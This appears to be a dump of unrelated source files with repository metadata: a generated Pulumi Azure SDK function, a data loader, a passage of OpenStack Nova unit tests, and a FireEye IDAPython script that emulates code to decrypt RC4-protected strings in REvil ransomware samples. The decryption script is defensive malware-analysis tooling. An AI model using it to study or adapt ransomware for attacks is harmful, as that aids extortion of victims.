] | null | null | null | sdk/python/pulumi_azure_native/machinelearningservices/v20180301preview/list_machine_learning_compute_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'ListMachineLearningComputeKeysResult',
'AwaitableListMachineLearningComputeKeysResult',
'list_machine_learning_compute_keys',
]
@pulumi.output_type
class ListMachineLearningComputeKeysResult:
"""
Secrets related to a Machine Learning compute. Might differ for every type of compute.
"""
def __init__(__self__, compute_type=None):
if compute_type and not isinstance(compute_type, str):
raise TypeError("Expected argument 'compute_type' to be a str")
pulumi.set(__self__, "compute_type", compute_type)
@property
@pulumi.getter(name="computeType")
def compute_type(self) -> str:
"""
The type of compute
"""
return pulumi.get(self, "compute_type")
class AwaitableListMachineLearningComputeKeysResult(ListMachineLearningComputeKeysResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return ListMachineLearningComputeKeysResult(
compute_type=self.compute_type)
def list_machine_learning_compute_keys(compute_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
workspace_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableListMachineLearningComputeKeysResult:
"""
Secrets related to a Machine Learning compute. Might differ for every type of compute.
:param str compute_name: Name of the Azure Machine Learning compute.
:param str resource_group_name: Name of the resource group in which workspace is located.
:param str workspace_name: Name of Azure Machine Learning workspace.
"""
__args__ = dict()
__args__['computeName'] = compute_name
__args__['resourceGroupName'] = resource_group_name
__args__['workspaceName'] = workspace_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:machinelearningservices/v20180301preview:listMachineLearningComputeKeys', __args__, opts=opts, typ=ListMachineLearningComputeKeysResult).value
return AwaitableListMachineLearningComputeKeysResult(
compute_type=__ret__.compute_type)
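# --- Editor's usage sketch (resource names below are placeholders) ---
#
#     keys = list_machine_learning_compute_keys(
#         compute_name="my-compute",
#         resource_group_name="my-rg",
#         workspace_name="my-ws")
#     pulumi.export("computeType", keys.compute_type)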
| 39.028986 | 192 | 0.705533 |
4a25a0b455c22974db1bf1b0745f14fba0b48b9a | 1,449 | py | Python | python/flare/revil_string_decrypt.py | clayne/flare-ida | b5b3993bdd224b7d6d7bd524045195550c156c44 | [
"Apache-2.0"
] | 1,471 | 2015-01-12T07:00:10.000Z | 2021-09-20T04:30:20.000Z | python/flare/revil_string_decrypt.py | clayne/flare-ida | b5b3993bdd224b7d6d7bd524045195550c156c44 | [
"Apache-2.0"
] | 80 | 2015-01-12T08:28:28.000Z | 2021-08-23T13:33:03.000Z | python/flare/revil_string_decrypt.py | clayne/flare-ida | b5b3993bdd224b7d6d7bd524045195550c156c44 | [
"Apache-2.0"
] | 427 | 2015-01-03T05:39:27.000Z | 2021-09-07T01:49:16.000Z | ############################################
# Copyright (C) 2021 FireEye, Inc.
#
# Author: Chuong Dong
#
# revil_string_decrypt is an IDAPython script that uses flare-emu (which combines Unicorn and
# IDA Pro) to automate string decryption for REvil ransomware samples.
#
# Dependencies:
# https://github.com/fireeye/flare-emu
############################################
from arc4 import ARC4
import idaapi, idc, idautils
import flare_emu
def RC4_crypt(key, buffer):
arc4 = ARC4(key)
result = list(arc4.decrypt(buffer))
string_result = ''
for each in result:
if each != 0:
string_result += chr(each)
return string_result
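# --- Editor's sanity check (illustrative; needs only the arc4 package) ---
# RC4 is symmetric, so encrypting with the same key round-trips through
# RC4_crypt:
#
#     assert RC4_crypt(b'key', ARC4(b'key').encrypt(b'hello')) == 'hello'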
def decode_callback(eh, address, argv, userData):
encoded_str_ea = eh.getRegVal('edx')
ENCRYPTED_STRING_BUFFER = argv[0]
key_offset = argv[1]
key_length = argv[2]
data_length = argv[3]
RC4_key = idaapi.get_bytes(ENCRYPTED_STRING_BUFFER + key_offset, key_length)
RC4_encrypted_buffer = idaapi.get_bytes(ENCRYPTED_STRING_BUFFER + key_offset + key_length, data_length)
decrypted_str = RC4_crypt(RC4_key, RC4_encrypted_buffer)
print(hex(address) + ' ' + decrypted_str)
eh.analysisHelper.setComment(address, decrypted_str, False)
eh = flare_emu.EmuHelper()
# Change "string_decrypt" to the string decryption function name on IDA Pro
eh.iterate(eh.analysisHelper.getNameAddr("string_decrypt"), decode_callback)
| 30.829787 | 107 | 0.68668 |
4a25a1282f91054de0829055d595b31806dc3575 | 3,473 | py | Python | nebulae/fuel/tank_pt.py | SeriaZheng/Nebulae | 27a0b78560e66f6ad6540ee7e04c29e03e632bbd | [
"MIT"
] | 2 | 2021-12-24T08:28:44.000Z | 2022-01-05T09:03:32.000Z | nebulae/fuel/tank_pt.py | SeriaZheng/Nebulae | 27a0b78560e66f6ad6540ee7e04c29e03e632bbd | [
"MIT"
] | null | null | null | nebulae/fuel/tank_pt.py | SeriaZheng/Nebulae | 27a0b78560e66f6ad6540ee7e04c29e03e632bbd | [
"MIT"
] | null | null | null | #!/usr/bin/env python
'''
Created by Seria at 02/11/2018 3:38 PM
Email: [email protected]
_ooOoo_
o888888888o
o88`_ . _`88o
(| 0 0 |)
O \ 。 / O
_____/`-----‘\_____
.’ \|| _ _ ||/ `.
| _ ||| | ||| _ |
| | \\ // | |
| | \-----/ | |
\ .\ ___/- -\___ /. /
,--- / ___\<|>/___ \ ---,
| |: \ \ / / :| |
`\--\_ -. ___ .- _/--/‘
=========== \__ NOBUG __/ ===========
'''
# -*- coding:utf-8 -*-
import os
import h5py
from multiprocessing import cpu_count
from math import ceil
from torch.utils.data import Dataset, DataLoader
class Tank(object):
def __init__(self, data_path, data_specf, batch_size, shuffle=True, in_same_size=True,
fetch_fn=None, prep_fn=None, collate_fn=None):
name = os.path.basename(data_path).split('.')[0]
rank = int(os.environ.get('RANK', -1))
nworld = int(os.environ.get('WORLD_SIZE', 1))
class TData(Dataset):
def __init__(self, verbose=True):
with h5py.File(data_path, 'r') as f:
# make sure that the first dimension is batch
self.length = len(f[list(data_specf.keys())[0]])
if verbose:
print('+' + (49 * '-') + '+')
print('| \033[1;35m%-20s\033[0m fuel tank has been mounted |'% name)
print('+' + (49 * '-') + '+')
def _openH5(self):
self.hdf5 = h5py.File(data_path, 'r')
def __getitem__(self, idx: int):
if not hasattr(self, 'hdf5'):
self._openH5()
item = fetch_fn(self.hdf5, idx)
if prep_fn is not None:
item = prep_fn(item)
return item
def __len__(self):
return self.length
self.name = name
self.rank = rank
self.tdata = TData(rank<=0)
self.counter = 0
self.batch_size = batch_size
if in_same_size:
self.MPE = len(self.tdata) // (batch_size * nworld)
else:
self.MPE = ceil(len(self.tdata) / (batch_size * nworld))
ncpus = cpu_count()
if rank >= 0:
from torch.utils.data import distributed as dist
self.sampler = dist.DistributedSampler(self.tdata)
self.tloader = DataLoader(self.tdata, batch_size, sampler=self.sampler,
collate_fn=collate_fn, drop_last=in_same_size, num_workers=ncpus)
else:
self.tloader = DataLoader(self.tdata, batch_size, shuffle,
collate_fn=collate_fn, drop_last=in_same_size, num_workers=ncpus)
def __del__(self):
if self.rank<=0:
print('+' + (53 * '-') + '+')
print('| \033[1;35m%-20s\033[0m fuel tank is no longer mounted |' % self.name)
print('+' + (53 * '-') + '+')
def __len__(self):
return len(self.tdata)
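    # --- Editor's usage sketch (fetch_fn/prep_fn are user-supplied; see
    # next() below for the epoch-aware iteration this drives) ---
    #
    #     tank = Tank('faces.hdf5', {'image': None}, batch_size=32,
    #                 fetch_fn=lambda h5, idx: h5['image'][idx])
    #     for _ in range(tank.MPE):
    #         batch = tank.next()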
def next(self):
        if self.counter == 0: # create a new iterator at the beginning of an epoch
self.iterator = self.tloader.__iter__()
self.counter += 1
if self.counter == self.MPE:
self.counter = 0
        return self.iterator.__next__()
| 36.177083 | 103 | 0.476533 |
4a25a3cd669ee1b7b4435440c4059bed6fc8327b | 51,386 | py | Python | nova/tests/unit/api/openstack/compute/test_server_actions.py | Nexenta/nova | ccecb507ff4bdcdd23d90e7b5b02a22c5a46ecc3 | ["Apache-2.0"] | 1 | 2020-08-14T02:20:59.000Z | 2020-08-14T02:20:59.000Z | nova/tests/unit/api/openstack/compute/test_server_actions.py | Nexenta/nova | ccecb507ff4bdcdd23d90e7b5b02a22c5a46ecc3 | ["Apache-2.0"] | 2 | 2021-03-31T20:04:16.000Z | 2021-12-13T20:45:03.000Z | nova/tests/unit/api/openstack/compute/test_server_actions.py | Nexenta/nova | ccecb507ff4bdcdd23d90e7b5b02a22c5a46ecc3 | ["Apache-2.0"] | 1 | 2020-07-24T02:31:45.000Z | 2020-07-24T02:31:45.000Z |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import uuidutils
import webob
from nova.api.openstack.compute import servers as servers_v21
from nova.compute import api as compute_api
from nova.compute import task_states
from nova.compute import vm_states
import nova.conf
from nova import exception
from nova.image import glance
from nova import objects
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_block_device
from nova.tests.unit import fake_instance
from nova.tests.unit.image import fake
CONF = nova.conf.CONF
FAKE_UUID = fakes.FAKE_UUID
class MockSetAdminPassword(object):
def __init__(self):
self.instance_id = None
self.password = None
def __call__(self, context, instance, password):
self.instance_id = instance['uuid']
self.password = password
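# Editor's note (illustrative): a callable stand-in like MockSetAdminPassword
# is typically swapped in via self.stub_out(...) so a test can assert on the
# recorded instance_id/password afterwards.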
class ServerActionsControllerTestV21(test.TestCase):
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
image_base_url = 'http://localhost:9292/images/'
image_href = image_base_url + '/' + image_uuid
servers = servers_v21
validation_error = exception.ValidationError
request_too_large_error = exception.ValidationError
image_url = None
def setUp(self):
super(ServerActionsControllerTestV21, self).setUp()
self.flags(group='glance', api_servers=['http://localhost:9292'])
self.stub_out('nova.compute.api.API.get',
fakes.fake_compute_get(vm_state=vm_states.ACTIVE,
project_id=fakes.FAKE_PROJECT_ID,
host='fake_host'))
self.stub_out('nova.objects.Instance.save', lambda *a, **kw: None)
fakes.stub_out_compute_api_snapshot(self)
fake.stub_out_image_service(self)
self.flags(enable_instance_password=True, group='api')
self._image_href = '155d900f-4e14-4e4c-a73d-069cbf4541e6'
self.controller = self._get_controller()
self.compute_api = self.controller.compute_api
# We don't care about anything getting as far as hitting the compute
# RPC API so we just mock it out here.
mock_rpcapi = mock.patch.object(self.compute_api, 'compute_rpcapi')
mock_rpcapi.start()
self.addCleanup(mock_rpcapi.stop)
# The project_id here matches what is used by default in
# fake_compute_get which need to match for policy checks.
self.req = fakes.HTTPRequest.blank('',
project_id=fakes.FAKE_PROJECT_ID)
self.context = self.req.environ['nova.context']
self.image_api = glance.API()
# Assume that anything that hits the compute API and looks for a
# RequestSpec doesn't care about it, since testing logic that deep
# should be done in nova.tests.unit.compute.test_compute_api.
mock_reqspec = mock.patch('nova.objects.RequestSpec')
mock_reqspec.start()
self.addCleanup(mock_reqspec.stop)
# Similarly we shouldn't care about anything hitting conductor from
# these tests.
mock_conductor = mock.patch.object(
self.controller.compute_api, 'compute_task_api')
mock_conductor.start()
self.addCleanup(mock_conductor.stop)
# Assume that none of the tests are using ports with resource requests.
self.mock_list_port = self.useFixture(
fixtures.MockPatch('nova.network.neutron.API.list_ports')).mock
self.mock_list_port.return_value = {'ports': []}
def _get_controller(self):
return self.servers.ServersController()
def _test_locked_instance(self, action, method=None, body_map=None,
compute_api_args_map=None):
if body_map is None:
body_map = {}
if compute_api_args_map is None:
compute_api_args_map = {}
args, kwargs = compute_api_args_map.get(action, ((), {}))
uuid = uuidutils.generate_uuid()
context = self.req.environ['nova.context']
instance = fake_instance.fake_db_instance(
id=1, uuid=uuid, vm_state=vm_states.ACTIVE, task_state=None,
project_id=context.project_id,
user_id=context.user_id)
instance = objects.Instance._from_db_object(
self.context, objects.Instance(), instance)
with test.nested(
mock.patch.object(compute_api.API, 'get',
return_value=instance),
mock.patch.object(compute_api.API, method,
side_effect=exception.InstanceIsLocked(
instance_uuid=instance['uuid'])),
) as (mock_get, mock_method):
controller_function = 'self.controller.' + action
self.assertRaises(webob.exc.HTTPConflict,
eval(controller_function),
self.req, instance['uuid'],
body=body_map.get(action))
expected_attrs = ['flavor', 'numa_topology']
if method == 'resize':
expected_attrs.append('services')
mock_get.assert_called_once_with(self.context, uuid,
expected_attrs=expected_attrs,
cell_down_support=False)
mock_method.assert_called_once_with(self.context, instance,
*args, **kwargs)
def test_actions_with_locked_instance(self):
actions = ['_action_resize', '_action_confirm_resize',
'_action_revert_resize', '_action_reboot',
'_action_rebuild']
method_translations = {'_action_resize': 'resize',
'_action_confirm_resize': 'confirm_resize',
'_action_revert_resize': 'revert_resize',
'_action_reboot': 'reboot',
'_action_rebuild': 'rebuild'}
body_map = {'_action_resize': {'resize': {'flavorRef': '2'}},
'_action_reboot': {'reboot': {'type': 'HARD'}},
'_action_rebuild': {'rebuild': {
'imageRef': self.image_uuid,
'adminPass': 'TNc53Dr8s7vw'}}}
args_map = {'_action_resize': (('2'), {'auto_disk_config': None}),
'_action_confirm_resize': ((), {}),
'_action_reboot': (('HARD',), {}),
'_action_rebuild': ((self.image_uuid,
'TNc53Dr8s7vw'), {})}
for action in actions:
method = method_translations.get(action)
self._test_locked_instance(action, method=method,
body_map=body_map,
compute_api_args_map=args_map)
def test_reboot_hard(self):
body = dict(reboot=dict(type="HARD"))
self.controller._action_reboot(self.req, FAKE_UUID, body=body)
def test_reboot_soft(self):
body = dict(reboot=dict(type="SOFT"))
self.controller._action_reboot(self.req, FAKE_UUID, body=body)
def test_reboot_incorrect_type(self):
body = dict(reboot=dict(type="NOT_A_TYPE"))
self.assertRaises(self.validation_error,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
def test_reboot_missing_type(self):
body = dict(reboot=dict())
self.assertRaises(self.validation_error,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
def test_reboot_none(self):
body = dict(reboot=dict(type=None))
self.assertRaises(self.validation_error,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
def test_reboot_not_found(self):
body = dict(reboot=dict(type="HARD"))
with mock.patch('nova.compute.api.API.get',
side_effect=exception.InstanceNotFound(
instance_id=uuids.fake)):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._action_reboot,
self.req, uuids.fake, body=body)
def test_reboot_raises_conflict_on_invalid_state(self):
body = dict(reboot=dict(type="HARD"))
def fake_reboot(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.reboot', fake_reboot)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
def test_reboot_soft_with_soft_in_progress_raises_conflict(self):
body = dict(reboot=dict(type="SOFT"))
self.stub_out('nova.compute.api.API.get',
fakes.fake_compute_get(project_id=fakes.FAKE_PROJECT_ID,
vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING))
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
def test_reboot_hard_with_soft_in_progress_does_not_raise(self):
body = dict(reboot=dict(type="HARD"))
self.stub_out('nova.compute.api.API.get',
fakes.fake_compute_get(project_id=fakes.FAKE_PROJECT_ID,
vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING))
self.controller._action_reboot(self.req, FAKE_UUID, body=body)
def test_reboot_hard_with_hard_in_progress(self):
body = dict(reboot=dict(type="HARD"))
self.stub_out('nova.compute.api.API.get',
fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING_HARD))
self.controller._action_reboot(self.req, FAKE_UUID, body=body)
def test_reboot_soft_with_hard_in_progress_raises_conflict(self):
body = dict(reboot=dict(type="SOFT"))
self.stub_out('nova.compute.api.API.get',
fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
vm_state=vm_states.ACTIVE,
task_state=task_states.REBOOTING_HARD))
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_reboot,
self.req, FAKE_UUID, body=body)
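    # Checks that preserve_ephemeral is forwarded to compute_api.rebuild()
    # only when the request body contains it; with no value in the body,
    # rebuild() must be called without the kwarg entirely.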
def _test_rebuild_preserve_ephemeral(self, value=None):
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='2',
vm_state=vm_states.ACTIVE,
host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
if value is not None:
body['rebuild']['preserve_ephemeral'] = value
with mock.patch.object(compute_api.API, 'rebuild') as mock_rebuild:
self.controller._action_rebuild(self.req, FAKE_UUID, body=body)
if value is not None:
mock_rebuild.assert_called_once_with(self.context, mock.ANY,
self._image_href, mock.ANY, preserve_ephemeral=value)
else:
mock_rebuild.assert_called_once_with(self.context, mock.ANY,
self._image_href, mock.ANY)
def test_rebuild_preserve_ephemeral_true(self):
self._test_rebuild_preserve_ephemeral(True)
def test_rebuild_preserve_ephemeral_false(self):
self._test_rebuild_preserve_ephemeral(False)
def test_rebuild_preserve_ephemeral_default(self):
self._test_rebuild_preserve_ephemeral()
def test_rebuild_accepted_minimum(self):
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
self_href = 'http://localhost/v2/servers/%s' % FAKE_UUID
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
robj = self.controller._action_rebuild(self.req, FAKE_UUID, body=body)
body = robj.obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertEqual(len(body['server']['adminPass']),
CONF.password_length)
self.assertEqual(robj['location'], self_href)
        # PEP 3333 requires applications to produce headers that are str
self.assertEqual(str, type(robj['location']))
def test_rebuild_instance_with_image_uuid(self):
info = dict(image_href_in_call=None)
def rebuild(self2, context, instance, image_href, *args, **kwargs):
info['image_href_in_call'] = image_href
self.stub_out('nova.compute.api.API.rebuild', rebuild)
# proper local hrefs must start with 'http://localhost/v2/'
body = {
'rebuild': {
'imageRef': self.image_uuid,
},
}
self.controller._action_rebuild(self.req, FAKE_UUID, body=body)
self.assertEqual(info['image_href_in_call'], self.image_uuid)
def test_rebuild_instance_with_image_href_uses_uuid(self):
# proper local hrefs must start with 'http://localhost/v2/'
body = {
'rebuild': {
'imageRef': self.image_href,
},
}
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_accepted_minimum_pass_disabled(self):
# run with enable_instance_password disabled to verify adminPass
# is missing from response. See lp bug 921814
self.flags(enable_instance_password=False, group='api')
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
self_href = 'http://localhost/v2/servers/%s' % FAKE_UUID
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
robj = self.controller._action_rebuild(self.req, FAKE_UUID, body=body)
body = robj.obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertNotIn("adminPass", body['server'])
self.assertEqual(robj['location'], self_href)
        # PEP 3333 requires applications to produce headers that are str
self.assertEqual(str, type(robj['location']))
def test_rebuild_raises_conflict_on_invalid_state(self):
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
def fake_rebuild(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.rebuild', fake_rebuild)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_accepted_with_metadata(self):
metadata = {'new': 'metadata'}
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
metadata=metadata,
vm_state=vm_states.ACTIVE, host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
"metadata": metadata,
},
}
body = self.controller._action_rebuild(self.req, FAKE_UUID,
body=body).obj
self.assertEqual(body['server']['metadata'], metadata)
def test_rebuild_accepted_with_bad_metadata(self):
body = {
"rebuild": {
"imageRef": self._image_href,
"metadata": "stack",
},
}
self.assertRaises(self.validation_error,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_with_too_large_metadata(self):
body = {
"rebuild": {
"imageRef": self._image_href,
"metadata": {
256 * "k": "value"
}
}
}
self.assertRaises(self.request_too_large_error,
self.controller._action_rebuild, self.req,
FAKE_UUID, body=body)
def test_rebuild_bad_entity(self):
body = {
"rebuild": {
"imageId": self._image_href,
},
}
self.assertRaises(self.validation_error,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_admin_pass(self):
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
"adminPass": "asdf",
},
}
body = self.controller._action_rebuild(self.req, FAKE_UUID,
body=body).obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertEqual(body['server']['adminPass'], 'asdf')
def test_rebuild_admin_pass_pass_disabled(self):
# run with enable_instance_password disabled to verify adminPass
# is missing from response. See lp bug 921814
self.flags(enable_instance_password=False, group='api')
return_server = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='2',
vm_state=vm_states.ACTIVE, host='fake_host')
self.stub_out('nova.compute.api.API.get', return_server)
body = {
"rebuild": {
"imageRef": self._image_href,
"adminPass": "asdf",
},
}
body = self.controller._action_rebuild(self.req, FAKE_UUID,
body=body).obj
self.assertEqual(body['server']['image']['id'], '2')
self.assertNotIn('adminPass', body['server'])
def test_rebuild_server_not_found(self):
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
with mock.patch('nova.compute.api.API.get',
side_effect=exception.InstanceNotFound(
instance_id=FAKE_UUID)):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_with_bad_image(self):
body = {
"rebuild": {
"imageRef": "foo",
},
}
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_accessIP(self):
attributes = {
'access_ip_v4': '172.19.0.1',
'access_ip_v6': 'fe80::1',
}
body = {
"rebuild": {
"imageRef": self._image_href,
"accessIPv4": "172.19.0.1",
"accessIPv6": "fe80::1",
},
}
data = {'changes': {}}
orig_get = compute_api.API.get
def wrap_get(*args, **kwargs):
data['instance'] = orig_get(*args, **kwargs)
return data['instance']
def fake_save(context, **kwargs):
data['changes'].update(data['instance'].obj_get_changes())
self.stub_out('nova.compute.api.API.get', wrap_get)
self.stub_out('nova.objects.Instance.save', fake_save)
self.controller._action_rebuild(self.req, FAKE_UUID, body=body)
self.assertEqual(self._image_href, data['changes']['image_ref'])
self.assertEqual("", data['changes']['kernel_id'])
self.assertEqual("", data['changes']['ramdisk_id'])
self.assertEqual(task_states.REBUILDING, data['changes']['task_state'])
self.assertEqual(0, data['changes']['progress'])
for attr, value in attributes.items():
self.assertEqual(value, str(data['changes'][attr]))
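    # The image used below advertises kernel/ramdisk ids that do not exist
    # in the fake image service, so the rebuild must fail with HTTP 400.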
def test_rebuild_when_kernel_not_exists(self):
def return_image_meta(*args, **kwargs):
image_meta_table = {
'2': {'id': uuids.image_id, 'status': 'active',
'container_format': 'ari'},
'155d900f-4e14-4e4c-a73d-069cbf4541e6':
{'id': uuids.image_id, 'status': 'active',
'container_format': 'raw',
'properties': {'kernel_id': 1, 'ramdisk_id': 2}},
}
image_id = args[2]
try:
image_meta = image_meta_table[str(image_id)]
except KeyError:
raise exception.ImageNotFound(image_id=image_id)
return image_meta
self.stub_out('nova.tests.unit.image.fake._FakeImageService.show',
return_image_meta)
body = {
"rebuild": {
"imageRef": "155d900f-4e14-4e4c-a73d-069cbf4541e6",
},
}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_rebuild_proper_kernel_ram(self):
instance_meta = {'kernel_id': None, 'ramdisk_id': None}
orig_get = compute_api.API.get
def wrap_get(*args, **kwargs):
inst = orig_get(*args, **kwargs)
instance_meta['instance'] = inst
return inst
def fake_save(context, **kwargs):
instance = instance_meta['instance']
for key in instance_meta.keys():
if key in instance.obj_what_changed():
instance_meta[key] = instance[key]
def return_image_meta(*args, **kwargs):
image_meta_table = {
uuids.kernel_image_id: {
'id': uuids.kernel_image_id,
'status': 'active',
'container_format': 'aki'},
uuids.ramdisk_image_id: {
'id': uuids.ramdisk_image_id,
'status': 'active',
'container_format': 'ari'},
'155d900f-4e14-4e4c-a73d-069cbf4541e6':
{'id': '155d900f-4e14-4e4c-a73d-069cbf4541e6',
'status': 'active',
'container_format': 'raw',
'properties': {'kernel_id': uuids.kernel_image_id,
'ramdisk_id': uuids.ramdisk_image_id}},
}
image_id = args[2]
try:
image_meta = image_meta_table[str(image_id)]
except KeyError:
raise exception.ImageNotFound(image_id=image_id)
return image_meta
self.stub_out('nova.tests.unit.image.fake._FakeImageService.show',
return_image_meta)
self.stub_out('nova.compute.api.API.get', wrap_get)
self.stub_out('nova.objects.Instance.save', fake_save)
body = {
"rebuild": {
"imageRef": "155d900f-4e14-4e4c-a73d-069cbf4541e6",
},
}
self.controller._action_rebuild(self.req, FAKE_UUID, body=body).obj
self.assertEqual(instance_meta['kernel_id'], uuids.kernel_image_id)
self.assertEqual(instance_meta['ramdisk_id'], uuids.ramdisk_image_id)
@mock.patch.object(compute_api.API, 'rebuild')
def test_rebuild_instance_raise_auto_disk_config_exc(self, mock_rebuild):
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
mock_rebuild.side_effect = exception.AutoDiskConfigDisabledByImage(
image='dummy')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
@mock.patch.object(compute_api.API, 'rebuild')
def test_rebuild_raise_invalid_architecture_exc(self, mock_rebuild):
body = {
"rebuild": {
"imageRef": self._image_href,
},
}
mock_rebuild.side_effect = exception.InvalidArchitectureName('arm64')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=body)
def test_resize_server(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.resize_called = False
def resize_mock(*args, **kwargs):
self.resize_called = True
self.stub_out('nova.compute.api.API.resize', resize_mock)
self.controller._action_resize(self.req, FAKE_UUID, body=body)
self.assertTrue(self.resize_called)
def test_resize_server_no_flavor(self):
body = dict(resize=dict())
self.assertRaises(self.validation_error,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_server_no_flavor_ref(self):
body = dict(resize=dict(flavorRef=None))
self.assertRaises(self.validation_error,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_server_with_extra_arg(self):
        body = dict(resize=dict(flavorRef="http://localhost/3",
                                extra_arg="extra_arg"))
self.assertRaises(self.validation_error,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_server_invalid_flavor_ref(self):
body = dict(resize=dict(flavorRef=1.2))
self.assertRaises(self.validation_error,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_with_server_not_found(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
with mock.patch('nova.compute.api.API.get',
side_effect=exception.InstanceNotFound(
instance_id=FAKE_UUID)):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
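    # Drives _action_resize through (raised, expected) exception pairs: the
    # two lock-stepped iterators come from zip(*exceptions), the stubbed
    # resize raises the next "raised" item on each call, and the matching
    # webob HTTP error class is asserted every iteration.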
def test_resize_with_image_exceptions(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.resize_called = 0
image_id = 'fake_image_id'
exceptions = [
(exception.ImageNotAuthorized(image_id=image_id),
webob.exc.HTTPUnauthorized),
(exception.ImageNotFound(image_id=image_id),
webob.exc.HTTPBadRequest),
(exception.Invalid, webob.exc.HTTPBadRequest),
(exception.AutoDiskConfigDisabledByImage(image=image_id),
webob.exc.HTTPBadRequest),
]
raised, expected = map(iter, zip(*exceptions))
def _fake_resize(obj, context, instance, flavor_id,
auto_disk_config=None):
self.resize_called += 1
raise next(raised)
self.stub_out('nova.compute.api.API.resize', _fake_resize)
for call_no in range(len(exceptions)):
next_exception = next(expected)
actual = self.assertRaises(next_exception,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
if (isinstance(exceptions[call_no][0],
exception.NoValidHost)):
self.assertEqual(actual.explanation,
'No valid host was found. Bad host')
elif (isinstance(exceptions[call_no][0],
exception.AutoDiskConfigDisabledByImage)):
self.assertEqual(actual.explanation,
'Requested image fake_image_id has automatic'
' disk resize disabled.')
